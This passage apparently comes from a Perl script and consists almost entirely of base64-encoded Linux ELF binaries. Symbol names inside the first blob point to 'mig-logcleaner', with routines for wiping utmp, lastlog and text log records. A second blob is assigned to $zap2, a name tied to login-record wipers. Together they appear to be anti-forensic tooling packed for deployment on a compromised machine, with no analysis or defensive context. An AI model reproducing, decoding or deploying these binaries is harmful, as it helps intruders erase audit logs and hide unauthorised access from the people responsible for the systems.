+Nzc7AGxvbmcgbG9uZyB1bnNpZ25lZCBpbnQ6dCgwLDcpPUBzNjQ7cigwLDcpOzAwMDAwMDAwMDAw +MDA7MDE3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc7AHNob3J0IGludDp0KDAsOCk9QHMxNjtyKDAsOCk7 +LTMyNzY4OzMyNzY3OwBzaG9ydCB1bnNpZ25lZCBpbnQ6dCgwLDkpPUBzMTY7cigwLDkpOzA7NjU1 +MzU7AHNpZ25lZCBjaGFyOnQoMCwxMCk9QHM4O3IoMCwxMCk7LTEyODsxMjc7AHVuc2lnbmVkIGNo +YXI6dCgwLDExKT1Aczg7cigwLDExKTswOzI1NTsAZmxvYXQ6dCgwLDEyKT1yKDAsMSk7NDswOwBk +b3VibGU6dCgwLDEzKT1yKDAsMSk7ODswOwBsb25nIGRvdWJsZTp0KDAsMTQpPXIoMCwxKTsxMjsw +OwBjb21wbGV4IGludDp0KDAsMTUpPXM4cmVhbDooMCwxKSwwLDMyO2ltYWc6KDAsMSksMzIsMzI7 +OwBjb21wbGV4IGZsb2F0OnQoMCwxNik9cigwLDE2KTs4OzA7AGNvbXBsZXggZG91YmxlOnQoMCwx +Nyk9cigwLDE3KTsxNjswOwBjb21wbGV4IGxvbmcgZG91YmxlOnQoMCwxOCk9cigwLDE4KTsyNDsw +OwBfX2J1aWx0aW5fdmFfbGlzdDp0KDAsMTkpPSooMCwyMCk9KDAsMjApAC4uL2luY2x1ZGUvbGli +Yy1zeW1ib2xzLmgAL3Vzci9zcmMvYnVpbGQvMTU4NjU4LWkzODYvQlVJTEQvZ2xpYmMtMi4yLjQv +YnVpbGQtaTM4Ni1saW51eC9jb25maWcuaAAuLi9zeXNkZXBzL2dudS9fR19jb25maWcuaAAuLi9z +eXNkZXBzL3VuaXgvc3lzdi9saW51eC9iaXRzL3R5cGVzLmgALi4vaW5jbHVkZS9mZWF0dXJlcy5o +AC4uL2luY2x1ZGUvc3lzL2NkZWZzLmgALi4vbWlzYy9zeXMvY2RlZnMuaAAvdXNyL2xpYi9nY2Mt +bGliL2kzODYtcmVkaGF0LWxpbnV4LzIuOTYvaW5jbHVkZS9zdGRkZWYuaABzaXplX3Q6dCg4LDEp +PSgwLDQpAF9fdV9jaGFyOnQoNCwxKT0oMCwxMSkAX191X3Nob3J0OnQoNCwyKT0oMCw5KQBfX3Vf +aW50OnQoNCwzKT0oMCw0KQBfX3VfbG9uZzp0KDQsNCk9KDAsNSkAX191X3F1YWRfdDp0KDQsNSk9 +KDAsNykAX19xdWFkX3Q6dCg0LDYpPSgwLDYpAF9faW50OF90OnQoNCw3KT0oMCwxMCkAX191aW50 +OF90OnQoNCw4KT0oMCwxMSkAX19pbnQxNl90OnQoNCw5KT0oMCw4KQBfX3VpbnQxNl90OnQoNCwx +MCk9KDAsOSkAX19pbnQzMl90OnQoNCwxMSk9KDAsMSkAX191aW50MzJfdDp0KDQsMTIpPSgwLDQp +AF9faW50NjRfdDp0KDQsMTMpPSgwLDYpAF9fdWludDY0X3Q6dCg0LDE0KT0oMCw3KQBfX3FhZGRy +X3Q6dCg0LDE1KT0oNCwxNik9Kig0LDYpAF9fZGV2X3Q6dCg0LDE3KT0oNCw1KQBfX3VpZF90OnQo +NCwxOCk9KDQsMykAX19naWRfdDp0KDQsMTkpPSg0LDMpAF9faW5vX3Q6dCg0LDIwKT0oNCw0KQBf +X21vZGVfdDp0KDQsMjEpPSg0LDMpAF9fbmxpbmtfdDp0KDQsMjIpPSg0LDMpAF9fb2ZmX3Q6dCg0 +LDIzKT0oMCwzKQBfX2xvZmZfdDp0KDQsMjQpPSg0LDYpAF9fcGlkX3Q6dCg0LDI1KT0oMCwxKQBf +X3NzaXplX3Q6dCg0LDI2KT0oMCwxKQBfX3JsaW1fdDp0KDQsMjcpPSg0LDQpAF9fcmxpbTY0X3Q6 +dCg0LDI4KT0oNCw1KQBfX2lkX3Q6dCg0LDI5KT0oNCwzKQBfX2ZzaWRfdDp0KDQsMzApPSg0LDMx +KT1zOF9fdmFsOig0LDMyKT1hcig0LDMzKT1yKDQsMzMpOzAwMDAwMDAwMDAwMDA7MDAzNzc3Nzc3 +Nzc3Nzs7MDsxOygwLDEpLDAsNjQ7OwBfX2RhZGRyX3Q6dCg0LDM0KT0oMCwxKQBfX2NhZGRyX3Q6 +dCg0LDM1KT0oNCwzNik9KigwLDIpAF9fdGltZV90OnQoNCwzNyk9KDAsMykAX191c2Vjb25kc190 +OnQoNCwzOCk9KDAsNCkAX19zdXNlY29uZHNfdDp0KDQsMzkpPSgwLDMpAF9fc3dibGtfdDp0KDQs +NDApPSgwLDMpAF9fY2xvY2tfdDp0KDQsNDEpPSgwLDMpAF9fY2xvY2tpZF90OnQoNCw0Mik9KDAs +MSkAX190aW1lcl90OnQoNCw0Myk9KDAsMSkAX19rZXlfdDp0KDQsNDQpPSgwLDEpAF9faXBjX3Bp +ZF90OnQoNCw0NSk9KDAsOSkAX19ibGtzaXplX3Q6dCg0LDQ2KT0oMCwzKQBfX2Jsa2NudF90OnQo +NCw0Nyk9KDAsMykAX19ibGtjbnQ2NF90OnQoNCw0OCk9KDQsNikAX19mc2Jsa2NudF90OnQoNCw0 +OSk9KDQsNCkAX19mc2Jsa2NudDY0X3Q6dCg0LDUwKT0oNCw1KQBfX2ZzZmlsY250X3Q6dCg0LDUx +KT0oNCw0KQBfX2ZzZmlsY250NjRfdDp0KDQsNTIpPSg0LDUpAF9faW5vNjRfdDp0KDQsNTMpPSg0 +LDUpAF9fb2ZmNjRfdDp0KDQsNTQpPSg0LDI0KQBfX3Rfc2NhbGFyX3Q6dCg0LDU1KT0oMCwzKQBf +X3RfdXNjYWxhcl90OnQoNCw1Nik9KDAsNSkAX19pbnRwdHJfdDp0KDQsNTcpPSgwLDEpAF9fc29j +a2xlbl90OnQoNCw1OCk9KDAsNCkALi4vbGludXh0aHJlYWRzL3N5c2RlcHMvcHRocmVhZC9iaXRz +L3B0aHJlYWR0eXBlcy5oAC4uL3N5c2RlcHMvdW5peC9zeXN2L2xpbnV4L2JpdHMvc2NoZWQuaABf +X3NjaGVkX3BhcmFtOlQoMTAsMSk9czRfX3NjaGVkX3ByaW9yaXR5OigwLDEpLDAsMzI7OwBfcHRo +cmVhZF9mYXN0bG9jazpUKDksMSk9czhfX3N0YXR1czooMCwzKSwwLDMyO19fc3BpbmxvY2s6KDAs +MSksMzIsMzI7OwBfcHRocmVhZF9kZXNjcjp0KDksMik9KDksMyk9Kig5LDQpPXhzX3B0aHJlYWRf +ZGVzY3Jfc3RydWN0OgBfX3B0aHJlYWRfYXR0cl9zOlQoOSw1KT1zMzZfX2RldGFjaHN0YXRlOigw +LDEpLDAsMzI7X19zY2hlZHBvbGljeTooMCwxKSwzMiwzMjtfX3NjaGVkcGFyYW06KDEwLDEpLDY0 +LDMyO19faW5oZXJpdHNjaGVkOigwLDEpLDk2LDMyO19fc2NvcGU6KDAsMSksMTI4LDMyO19fZ3Vh +cmRzaXplOig4LDEpLDE2MCwzMjtfX3N0YWNrYWRkcl9zZXQ6KDAsMSksMTkyLDMyO19fc3RhY2th +ZGRyOigwLDE5KSwyMjQsMzI7X19zdGFja3NpemU6KDgsMSksMjU2LDMyOzsAcHRocmVhZF9hdHRy +X3Q6dCg5LDYpPSg5LDUpAHB0aHJlYWRfY29uZF90OnQoOSw3KT0oOSw4KT1zMTJfX2NfbG9jazoo +OSwxKSwwLDY0O19fY193YWl0aW5nOig5LDIpLDY0LDMyOzsAcHRocmVhZF9jb25kYXR0cl90OnQo +OSw5KT0oOSwxMCk9czRfX2R1bW15OigwLDEpLDAsMzI7OwBwdGhyZWFkX2tleV90OnQoOSwxMSk9 +KDAsNCkAcHRocmVhZF9tdXRleF90OnQoOSwxMik9KDksMTMpPXMyNF9fbV9yZXNlcnZlZDooMCwx +KSwwLDMyO19fbV9jb3VudDooMCwxKSwzMiwzMjtfX21fb3duZXI6KDksMiksNjQsMzI7X19tX2tp +bmQ6KDAsMSksOTYsMzI7X19tX2xvY2s6KDksMSksMTI4LDY0OzsAcHRocmVhZF9tdXRleGF0dHJf +dDp0KDksMTQpPSg5LDE1KT1zNF9fbXV0ZXhraW5kOigwLDEpLDAsMzI7OwBwdGhyZWFkX29uY2Vf +dDp0KDksMTYpPSgwLDEpAF9wdGhyZWFkX3J3bG9ja190OlQoOSwxNyk9czMyX19yd19sb2NrOig5 +LDEpLDAsNjQ7X19yd19yZWFkZXJzOigwLDEpLDY0LDMyO19fcndfd3JpdGVyOig5LDIpLDk2LDMy +O19fcndfcmVhZF93YWl0aW5nOig5LDIpLDEyOCwzMjtfX3J3X3dyaXRlX3dhaXRpbmc6KDksMiks +MTYwLDMyO19fcndfa2luZDooMCwxKSwxOTIsMzI7X19yd19wc2hhcmVkOigwLDEpLDIyNCwzMjs7 +AHB0aHJlYWRfcndsb2NrX3Q6dCg5LDE4KT0oOSwxNykAcHRocmVhZF9yd2xvY2thdHRyX3Q6dCg5 +LDE5KT0oOSwyMCk9czhfX2xvY2traW5kOigwLDEpLDAsMzI7X19wc2hhcmVkOigwLDEpLDMyLDMy +OzsAcHRocmVhZF9zcGlubG9ja190OnQoOSwyMSk9KDAsMSkAcHRocmVhZF9iYXJyaWVyX3Q6dCg5 +LDIyKT0oOSwyMyk9czIwX19iYV9sb2NrOig5LDEpLDAsNjQ7X19iYV9yZXF1aXJlZDooMCwxKSw2 +NCwzMjtfX2JhX3ByZXNlbnQ6KDAsMSksOTYsMzI7X19iYV93YWl0aW5nOig5LDIpLDEyOCwzMjs7 +AHB0aHJlYWRfYmFycmllcmF0dHJfdDp0KDksMjQpPSg5LDI1KT1zNF9fcHNoYXJlZDooMCwxKSww +LDMyOzsAcHRocmVhZF90OnQoOSwyNik9KDAsNSkAd2NoYXJfdDp0KDExLDEpPSgwLDMpAHdpbnRf +dDp0KDExLDIpPSgwLDQpAC4uL2luY2x1ZGUvd2NoYXIuaAAuLi93Y3NtYnMvd2NoYXIuaAAuLi9z +eXNkZXBzL3VuaXgvc3lzdi9saW51eC9pMzg2L2JpdHMvd2NoYXIuaABfX21ic3RhdGVfdDp0KDEz +LDEpPSgxMywyKT1zOF9fY291bnQ6KDAsMSksMCwzMjtfX3ZhbHVlOigxMywzKT11NF9fd2NoOigx +MSwyKSwwLDMyO19fd2NoYjooMTMsNCk9YXIoNCwzMyk7MDszOygwLDIpLDAsMzI7OywzMiwzMjs7 +AF9HX2Zwb3NfdDp0KDMsMSk9KDMsMik9czEyX19wb3M6KDQsMjMpLDAsMzI7X19zdGF0ZTooMTMs +MSksMzIsNjQ7OwBfR19mcG9zNjRfdDp0KDMsMyk9KDMsNCk9czE2X19wb3M6KDQsNTQpLDAsNjQ7 +X19zdGF0ZTooMTMsMSksNjQsNjQ7OwAuLi9pbmNsdWRlL2djb252LmgALi4vaWNvbnYvZ2NvbnYu +aAAgOlQoMTcsMSk9ZV9fR0NPTlZfT0s6MCxfX0dDT05WX05PQ09OVjoxLF9fR0NPTlZfTk9EQjoy +LF9fR0NPTlZfTk9NRU06MyxfX0dDT05WX0VNUFRZX0lOUFVUOjQsX19HQ09OVl9GVUxMX09VVFBV +VDo1LF9fR0NPTlZfSUxMRUdBTF9JTlBVVDo2LF9fR0NPTlZfSU5DT01QTEVURV9JTlBVVDo3LF9f +R0NPTlZfSUxMRUdBTF9ERVNDUklQVE9SOjgsX19HQ09OVl9JTlRFUk5BTF9FUlJPUjo5LDsAIDpU +KDE3LDIpPWVfX0dDT05WX0lTX0xBU1Q6MSxfX0dDT05WX0lHTk9SRV9FUlJPUlM6Miw7AF9fZ2Nv +bnZfZmN0OnQoMTcsMyk9KDE3LDQpPSooMTcsNSk9ZigwLDEpAF9fZ2NvbnZfaW5pdF9mY3Q6dCgx +Nyw2KT0oMTcsNyk9KigxNyw4KT1mKDAsMSkAX19nY29udl9lbmRfZmN0OnQoMTcsOSk9KDE3LDEw +KT0qKDE3LDExKT1mKDAsMjApAF9fZ2NvbnZfdHJhbnNfZmN0OnQoMTcsMTIpPSgxNywxMyk9Kigx +NywxNCk9ZigwLDEpAF9fZ2NvbnZfdHJhbnNfY29udGV4dF9mY3Q6dCgxNywxNSk9KDE3LDE2KT0q +KDE3LDE3KT1mKDAsMSkAX19nY29udl90cmFuc19xdWVyeV9mY3Q6dCgxNywxOCk9KDE3LDE5KT0q +KDE3LDIwKT1mKDAsMSkAX19nY29udl90cmFuc19pbml0X2ZjdDp0KDE3LDIxKT0oMTcsMjIpPSoo +MTcsMjMpPWYoMCwxKQBfX2djb252X3RyYW5zX2VuZF9mY3Q6dCgxNywyNCk9KDE3LDI1KT0qKDE3 +LDI2KT1mKDAsMjApAF9fZ2NvbnZfdHJhbnNfZGF0YTpUKDE3LDI3KT1zMjBfX3RyYW5zX2ZjdDoo +MTcsMTIpLDAsMzI7X190cmFuc19jb250ZXh0X2ZjdDooMTcsMTUpLDMyLDMyO19fdHJhbnNfZW5k +X2ZjdDooMTcsMjQpLDY0LDMyO19fZGF0YTooMCwxOSksOTYsMzI7X19uZXh0OigxNywyOCk9Kigx +NywyNyksMTI4LDMyOzsAX19nY29udl9zdGVwOlQoMTcsMjkpPXM1Nl9fc2hsaWJfaGFuZGxlOigx +NywzMCk9KigxNywzMSk9eHNfX2djb252X2xvYWRlZF9vYmplY3Q6LDAsMzI7X19tb2RuYW1lOigx +NywzMik9KigwLDIpLDMyLDMyO19fY291bnRlcjooMCwxKSw2NCwzMjtfX2Zyb21fbmFtZTooNCwz +NiksOTYsMzI7X190b19uYW1lOig0LDM2KSwxMjgsMzI7X19mY3Q6KDE3LDMpLDE2MCwzMjtfX2lu +aXRfZmN0OigxNyw2KSwxOTIsMzI7X19lbmRfZmN0OigxNyw5KSwyMjQsMzI7X19taW5fbmVlZGVk +X2Zyb206KDAsMSksMjU2LDMyO19fbWF4X25lZWRlZF9mcm9tOigwLDEpLDI4OCwzMjtfX21pbl9u +ZWVkZWRfdG86KDAsMSksMzIwLDMyO19fbWF4X25lZWRlZF90bzooMCwxKSwzNTIsMzI7X19zdGF0 +ZWZ1bDooMCwxKSwzODQsMzI7X19kYXRhOigwLDE5KSw0MTYsMzI7OwBfX2djb252X3N0ZXBfZGF0 +YTpUKDE3LDMzKT1zMzZfX291dGJ1ZjooMTcsMzQpPSooMCwxMSksMCwzMjtfX291dGJ1ZmVuZDoo +MTcsMzQpLDMyLDMyO19fZmxhZ3M6KDAsMSksNjQsMzI7X19pbnZvY2F0aW9uX2NvdW50ZXI6KDAs +MSksOTYsMzI7X19pbnRlcm5hbF91c2U6KDAsMSksMTI4LDMyO19fc3RhdGVwOigxNywzNSk9Kigx +MywxKSwxNjAsMzI7X19zdGF0ZTooMTMsMSksMTkyLDY0O19fdHJhbnM6KDE3LDI4KSwyNTYsMzI7 +OwBfX2djb252X2luZm86VCgxNywzNik9czhfX25zdGVwczooOCwxKSwwLDMyO19fc3RlcHM6KDE3 +LDM3KT0qKDE3LDI5KSwzMiwzMjtfX2RhdGE6KDE3LDM4KT1hcig0LDMzKTswOy0xOygxNywzMyks +NjQsMDs7AF9fZ2NvbnZfdDp0KDE3LDM5KT0oMTcsNDApPSooMTcsMzYpAF9HX2ljb252X3Q6dCgz +LDUpPSgzLDYpPXU0NF9fY2Q6KDE3LDM2KSwwLDY0O19fY29tYmluZWQ6KDMsNyk9czQ0X19jZDoo +MTcsMzYpLDAsNjQ7X19kYXRhOigxNywzMyksNjQsMjg4OzssMCwzNTI7OwBfR19pbnQxNl90OnQo +Myw4KT0oMCw4KQBfR19pbnQzMl90OnQoMyw5KT0oMCwxKQBfR191aW50MTZfdDp0KDMsMTApPSgw +LDkpAF9HX3VpbnQzMl90OnQoMywxMSk9KDAsNCkAX0lPX3N0ZGluX3VzZWQ6RygwLDEpAABHQ0M6 +IChHTlUpIDIuOTYgMjAwMDA3MzEgKFJlZCBIYXQgTGludXggNy4yIDIuOTYtMTA4LjcuMikAAEdD +QzogKEdOVSkgMi45NiAyMDAwMDczMSAoUmVkIEhhdCBMaW51eCA3LjIgMi45Ni0xMDguNy4yKQAA +R0NDOiAoR05VKSAyLjk2IDIwMDAwNzMxIChSZWQgSGF0IExpbnV4IDcuMSAyLjk2LTk4KQAAR0ND +OiAoR05VKSAyLjk2IDIwMDAwNzMxIChSZWQgSGF0IExpbnV4IDcuMSAyLjk2LTk4KQAAR0NDOiAo +R05VKSAyLjk2IDIwMDAwNzMxIChSZWQgSGF0IExpbnV4IDcuMSAyLjk2LTk4KQAAR0NDOiAoR05V +KSAyLjk2IDIwMDAwNzMxIChSZWQgSGF0IExpbnV4IDcuMiAyLjk2LTEwOC43LjIpAAgAAAAAAAAA +AQAAADAxLjAxAAAACAAAAAAAAAABAAAAMDEuMDEAAAAIAAAAAAAAAAEAAAAwMS4wMQAAAAgAAAAA +AAAAAQAAADAxLjAxAAAACAAAAAAAAAABAAAAMDEuMDEAAAAIAAAAAAAAAAEAAAAwMS4wMQAAAAAu +c3ltdGFiAC5zdHJ0YWIALnNoc3RydGFiAC5pbnRlcnAALm5vdGUuQUJJLXRhZwAuaGFzaAAuZHlu +c3ltAC5keW5zdHIALmdudS52ZXJzaW9uAC5nbnUudmVyc2lvbl9yAC5yZWwuZHluAC5yZWwucGx0 +AC5pbml0AC5wbHQALnRleHQALmZpbmkALnJvZGF0YQAuZGF0YQAuZWhfZnJhbWUALmN0b3JzAC5k +dG9ycwAuZ290AC5keW5hbWljAC5zYnNzAC5ic3MALnN0YWIALnN0YWJzdHIALmNvbW1lbnQALm5v +dGUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABsAAAABAAAAAgAA +APSABAj0AAAAEwAAAAAAAAAAAAAAAQAAAAAAAAAjAAAABwAAAAIAAAAIgQQICAEAACAAAAAAAAAA +AAAAAAQAAAAAAAAAMQAAAAUAAAACAAAAKIEECCgBAADIAAAABAAAAAAAAAAEAAAABAAAADcAAAAL +AAAAAgAAAPCBBAjwAQAA8AEAAAUAAAABAAAABAAAABAAAAA/AAAAAwAAAAIAAADggwQI4AMAACwB +AAAAAAAAAAAAAAEAAAAAAAAARwAAAP///28CAAAADIUECAwFAAA+AAAABAAAAAAAAAACAAAAAgAA +AFQAAAD+//9vAgAAAEyFBAhMBQAAMAAAAAUAAAABAAAABAAAAAAAAABjAAAACQAAAAIAAAB8hQQI + + + +fAUAACAAAAAEAAAAAAAAAAQAAAAIAAAAbAAAAAkAAAACAAAAnIUECJwFAADIAAAABAAAAAsAAAAE +AAAACAAAAHUAAAABAAAABgAAAGSGBAhkBgAAGAAAAAAAAAAAAAAABAAAAAAAAAB7AAAAAQAAAAYA +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 +AAC8hgQILwAAABIAAACvAQAAOKYECH8BAAASAAwAtQEAAMyGBAg3AAAAEgAAAMYBAAAgqAQIBAAA +ABAADgDNAQAA3IYECCkAAAASAAAA4AEAAADHBAgEAAAAEQAPAOIBAADshgQI5AIAABIAAAD0AQAA +SKEECBAEAAASAAwA+QEAAGSGBAgAAAAAEgAKAP8BAAD8hgQIcAIAABIAAAARAgAAWKUECN4AAAAS +AAwAGwIAAAyHBAhcAAAAEgAAAC0CAAAchwQIrAAAACIAAABQAgAAVMgECAQAAAARABYAYgIAAFjI +BAgEAAAAEQAWAHQCAAAgiAQIAAAAABIADAB7AgAALIcECDAAAAASAAAAjQIAAOSXBAg7AQAAEgAM +AJsCAAAgmQQIKAgAABIADACjAgAAPIcECB0AAAASAAAAtQIAAPzGBAgEAAAAEQAPALcCAABckQQI +hQYAABIADADCAgAAVMgECAAAAAARAPH/zgIAACCJBAhYBwAAEgAMANMCAABMhwQIxgAAABIAAADw +AgAA4MYECAAAAAAgAA8A+wIAAFyHBAguAAAAEgAAAA0DAAAAqAQIAAAAABIADQATAwAAbIcECD0A +AAASAAAAJAMAAHyHBAg3AAAAEgAAADYDAACMhwQIgQAAACIAAABSAwAAnIcECD0AAAASAAAAYgMA +AKyHBAgxAAAAEgAAAHMDAAC8hwQIPQEAABIAAACHAwAAzIcECPUAAAASAAAAlwMAANyHBAgnAAAA +EgAAAKcDAABUyAQIAAAAABEA8f+uAwAAGMcECAAAAAARABMAxAMAAHjIBAgAAAAAEQDx/8kDAABc +yAQIBAAAABEAFgDbAwAAJKgECAQAAAARAA4A6gMAAOyHBAgpAAAAEgAAAP0DAADgxgQIAAAAABAA +DwAKBAAA/IcECD0AAAASAAAAGgQAAAAAAAAAAAAAIAAAACkEAAAMiAQIHwAAABIAAAAAaW5pdGZp +bmkuYwBnY2MyX2NvbXBpbGVkLgBjYWxsX2dtb25fc3RhcnQAaW5pdC5jAGNydHN0dWZmLmMAcC4w +AF9fRFRPUl9MSVNUX18AY29tcGxldGVkLjEAX19kb19nbG9iYWxfZHRvcnNfYXV4AF9fRUhfRlJB +TUVfQkVHSU5fXwBmaW5pX2R1bW15AG9iamVjdC4yAGZyYW1lX2R1bW15AGluaXRfZHVtbXkAZm9y +Y2VfdG9fZGF0YQBfX0NUT1JfTElTVF9fAF9fZG9fZ2xvYmFsX2N0b3JzX2F1eABfX0NUT1JfRU5E +X18AX19EVE9SX0VORF9fAF9fRlJBTUVfRU5EX18AbWlnLWxvZ2NsZWFuZXIuYwBsYXN0bG9nX2hv +c3RuYW1lAGxhc3Rsb2dfdGltZQBsYXN0bG9nX3R0eQBhdG9sQEBHTElCQ18yLjAAY291bnRfcmVj +b3JkcwBfRFlOQU1JQwBfX3JlZ2lzdGVyX2ZyYW1lX2luZm9AQEdMSUJDXzIuMAB3cml0ZUBAR0xJ +QkNfMi4wAHN0cmNtcEBAR0xJQkNfMi4wAHVzYWdlAGNsb3NlQEBHTElCQ18yLjAAX2ZwX2h3AGZw +cmludGZAQEdMSUJDXzIuMABsAHN5c3RlbUBAR0xJQkNfMi4wAGFkZGQAX2luaXQAbWFsbG9jQEBH +TElCQ18yLjAAdHh0X2NsZWFuAHJlbW92ZUBAR0xJQkNfMi4wAF9fZGVyZWdpc3Rlcl9mcmFtZV9p +bmZvQEBHTElCQ18yLjAAc3Rkb3V0QEBHTElCQ18yLjAAc3RkZXJyQEBHTElCQ18yLjAAX3N0YXJ0 +AGdldG9wdEBAR0xJQkNfMi4wAGxhc3Rsb2dfY2xlYW4AcmVwbGFzZQBzdHJsZW5AQEdMSUJDXzIu +MABjAHV0bXBfY2xlYW4AX19ic3Nfc3RhcnQAbWFpbgBfX2xpYmNfc3RhcnRfbWFpbkBAR0xJQkNf +Mi4wAGRhdGFfc3RhcnQAcHJpbnRmQEBHTElCQ18yLjAAX2ZpbmkAbHNlZWtAQEdMSUJDXzIuMABt +ZW1jcHlAQEdMSUJDXzIuMABfX2N4YV9maW5hbGl6ZUBAR0xJQkNfMi4xLjMAb3BlbkBAR0xJQkNf +Mi4wAGJ6ZXJvQEBHTElCQ18yLjAAZ2V0cHduYW1AQEdMSUJDXzIuMABleGl0QEBHTElCQ18yLjAA +YXRvaUBAR0xJQkNfMi4wAF9lZGF0YQBfR0xPQkFMX09GRlNFVF9UQUJMRV8AX2VuZABvcHRhcmdA +QEdMSUJDXzIuMABfSU9fc3RkaW5fdXNlZABzcHJpbnRmQEBHTElCQ18yLjAAX19kYXRhX3N0YXJ0 +AHJlYWRAQEdMSUJDXzIuMABfX2dtb25fc3RhcnRfXwBzdHJjcHlAQEdMSUJDXzIuMAA="; + +$zap2="f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAcIQECDQAAABEDAAAAAAAADQAIAAHACgAGwAYAAYAAAA0 +AAAANIAECDSABAjgAAAA4AAAAAUAAAAEAAAAAwAAABQBAAAUgQQIFIEECBMAAAATAAAABAAAAAEA +AAABAAAAAAAAAACABAgAgAQIowkAAKMJAAAFAAAAABAAAAEAAACkCQAApJkECKSZBAgoAQAAMAEA +AAYAAAAAEAAAAgAAALQJAAC0mQQItJkECMgAAADIAAAABgAAAAQAAAAEAAAAKAEAACiBBAgogQQI +IAAAACAAAAAEAAAABAAAAFHldGQAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAAAEAAAAL2xpYi9sZC1s +aW51eC5zby4yAAAEAAAAEAAAAAEAAABHTlUAAAAAAAIAAAACAAAABQAAAAMAAAAOAAAADQAAAAwA +AAALAAAAAAAAAAAAAAABAAAAAAAAAAAAAAADAAAABAAAAAUAAAAGAAAAAgAAAAkAAAAIAAAABwAA +AAoAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAB8AAAAEgAAAGcAAAAAAAAAcQAAABIAAABbAAAA +AAAAAB0AAAASAAAAKQAAAAAAAACsAAAAEgAAAEkAAAAAAAAA1QAAABIAAAALAAAAAAAAACkAAAAS +AAAAEgAAAAAAAAA8AAAAEgAAAGIAAAAAAAAAfAAAABIAAAAYAAAAAAAAADAAAAASAAAAMQAAAAAA +AAD/AAAAEgAAADoAAABgiQQIBAAAABEADgAkAAAAAAAAAHwAAAASAAAAbQAAAAAAAAAAAAAAIAAA +AABsaWJjLnNvLjYAcHJpbnRmAGxzZWVrAGJ6ZXJvAHdyaXRlAHJlYWQAc3RybmNtcABnZXRwd25h 